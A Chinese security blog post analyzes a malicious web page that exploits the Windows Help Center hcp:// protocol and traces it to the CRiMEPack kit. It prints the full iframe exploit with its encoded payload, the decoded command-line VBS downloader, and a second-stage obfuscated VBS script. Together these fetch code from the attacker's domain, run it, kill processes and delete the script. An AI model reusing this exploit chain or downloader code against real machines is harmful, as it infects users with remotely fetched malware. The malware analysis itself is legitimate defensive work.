虽然网上前一阵子炒作的一身劲,不过实际运用HCP的毒网还真少见,刚才在剑盟看到一个(http://bbs.janmeng.com/redirect.php?tid=939059&goto=lastpost#lastpost),网址是hxxp://www.goodgirlsbadguys.com/zan/hcp.php?type=1&o=xp&b=ff,代码记录如下:

本文来自www.sacour.cn 转载注明来源

为了防止误报,转换成全角了
+顺手写了一个半角>>全角转换页面,方便转换,请见 : http://www.sacour.cn/convert.htm

<iframe src ="hcp://services/search?query=crimepack&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,89,61,34,90,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,119,119,119,46,103,111,111,100,103,105,114,108,115,98,97,100,103,117,121,115,46,99,111,109,47,122,97,110,47,104,99,112,46,112,104,112,63,116,121,112,101,61,51,38,98,61,102,102,38,111,61,120,112,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,84,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,85,32,61,32,84,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,89,58,83,101,116,32,74,61,84,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,85,41,58,74,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,74,46,67,108,111,115,101,58,83,69,84,32,81,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,58,81,46,82,117,110,32,85,32,62,32,37,84,69,77,80,37,92,90,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,90,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,119,109,112,108,97,121,101,114,46,101,120,101)))%3C/script%3E">

毕竟是那种类似于XSS的代码嘛,解密也简单,只要把它后面的那一组数据解开就行了,结果是:


cmd /c echo Y="Z.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://www.goodgirlsbadguys.com/zan/hcp.php?type=3&b=ff&o=xp",false:.send():Set T = CreateObject("Scripting.FileSystemObject"):U = T.GetSpecialFolder(2) + "\" + Y:Set J=T.CreateTextFile(U):J.WriteLine .responseText:End With:J.Close:SET Q = CreateObject("WScript.Shell"):Q.Run U > %TEMP%\Z.vbs && %TEMP%\Z.vbs && taskkill /F /IM helpctr.exe && taskkill /F /IM wmplayer.exe

就是这个文件了:hxxp://www.goodgirlsbadguys.com/zan/hcp.php?type=3&b=ff&o=xp

仔细看看代码,原来这个是CRiMEPack生成的恶意网页。

上一步下载到%temp%\z.vbs的hcp.php这个理所当然是个vbs文件,文件前面的SUB V1、SUB V2……SUB V76什么的都是空过程,所以我就删掉了。往下看代码,其实这个东西有点像是MS06014的样子,但是由于VBS在本地执行了,文件的操作权限肯定是高于远程执行时候的权限,所以对这个VBS来说下载文件什么的都很容易操作,没有在网页中执行014的种种限制。

代码中间有一个D=StrReverse(...),StrReverse是翻转字符用的函数,这个也简单, 直接使用Redoce的解密-7/翻转 就可以了。最终结果是:
hxxp://www.goodgirlsbadguys.com/zan/load.php?spl=hcp&b=ff&o=xp&i=hcp


Sub A761EVu_5(): I=1: V=false: D = StrReverse("pch=i&px=o&ff=b&pch=lps?php.daol/naz/moc.syugdabslrigdoog.www//:ptth"): Set X = Createobject(StrReverse(Replace("tK191_m118_3cK191_m118_3eK191_m118_3jbK191_m118_3OmK191_m118_3etK191_m118_3syK191_m118_3SeK191_m118_3liK191_m118_3F.K191_m118_3gnK191_m118_3itK191_m118_3pirK191_m118_3cS","K191_m118_3",""))): L = X.GetSpecialFolder(2) & StrReverse("abtuasbv.tab\"): O = StrReverse("TEG"): Set U = CreateObject(StrReverse(Replace("K191_m118_3PTK191_m118_3THK191_m118_3LMK191_m118_3X.K191_m118_32LK191_m118_3MXK191_m118_3SK191_m118_3M","K191_m118_3",""))): Set C = CreateObject(StrReverse(Replace("mK191_m118_3aeK191_m118_3rtK191_m118_3S.BK191_m118_3DK191_m118_3ODK191_m118_3A","K191_m118_3",""))): Set H=Createobject(StrReverse(Replace("tK191_m118_3cejbK191_m118_3OK191_m118_3metsyK191_m118_3SK191_m118_3eliK191_m118_3F.gK191_m118_3nitK191_m118_3pirK191_m118_3cS","K191_m118_3",""))):On Error resume next:U.open O, D, V: U.send() :If U.Status = 200 Then 
     u=U.ResponseBody:C.Open:C.Type = I:C.Write u:C.SaveToFile L:C.Close
     End If:CreateObject(StrReverse("llehS.tpircSW")).eXeC L:CreateObject(StrReverse("llehS.tpircSW")).eXeC StrReverse(Replace("K191_m118_3eK191_m118_3xK191_m118_3eK191_m118_3.K191_m118_3rK191_m118_3eK191_m118_3yK191_m118_3aK191_m118_3lK191_m118_3pmK191_m118_3w MK191_m118_3I/ FK191_m118_3/ lK191_m118_3liK191_m118_3kkK191_m118_3sK191_m118_3atK191_m118_3","K191_m118_3","")):A = X.GetSpecialFolder(2) & "\" & wscript.scriptname:Set J=H.GetFile(A): J.Delete:End Sub:V0